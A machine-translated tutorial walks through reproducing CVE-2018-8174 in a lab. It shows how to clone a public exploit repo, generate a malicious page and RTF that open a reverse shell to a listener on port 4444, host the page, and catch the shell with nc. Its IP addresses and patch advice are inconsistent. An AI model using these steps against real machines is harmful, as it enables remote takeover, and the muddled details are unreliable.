Shulou(Shulou.com)05/31 Report--

This article shows you how to reproduce the 0day vulnerability CVE-2018-8174. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Vulnerability description:

CVE-2018-8174 is a Windows VBScriptEngine code execution vulnerability. Due to this vulnerability in VBScript script execution engine (vbscript.dll), an attacker can embed malicious VBScript into an Office file or website. Once a user is induced or inadvertently clicks on a malicious link or document, the attacker can remotely gain the privileges of the current user's system and then take full control of the user's computer.

On April 18, 2018, after a domestic information security company monitored an attack using the vulnerability, it communicated with Microsoft on the same day and submitted the relevant information to Microsoft. Microsoft confirmed the vulnerability on April 20 and released an official security patch on May 8 to fix it and named it CVE-2018-8174. In China, the vulnerability is known as the "double kill" vulnerability.

Recurrence process

Attack plane: Linuxkali ip:192.168.1.117

Target machine: Windows7 professional edition ip:192.168.1.118

Note: due to the limitation of the target environment, the vulnerability is verified only by clicking on malicious links on the website to obtain permissions.

First download the project from github:

# git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

Generate html pages and word documents with malicious VBscript

# pythonCVE-2018-8174.py-u http://192.168.220.117/exploit.html-o msf.rtf-i192.168.220.117-p 4444

Where:-u specifies the URL address,-o specifies the generated document,-I specifies the listening address, and-p specifies the listening port

Note: you need to go to the project folder before building, otherwise you will not be prompted to find the file

After generation, ls looks at the files in the current directory to make sure that the required files are complete

Copy explot.html to the / var/www/html path and start the apache service

Nc directive, used to listen on port 4444

After we start listening, we use the target machine, that is, the windows7 browser, to open the malicious link generated by the attack plane: 192.168.1.117/exploit.html

Although the web page reported an error, it can be found that the attack plane has obtained the system permission of the target plane.

Repair suggestion

This vulnerability was officially fixed by Microsoft on May 8, 2018. Win10 is not affected by this vulnerability, and the following versions of win10 are not affected by this vulnerability after installing this patch.

The above content is how to reproduce the 0day vulnerability CVE-2018-8174. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.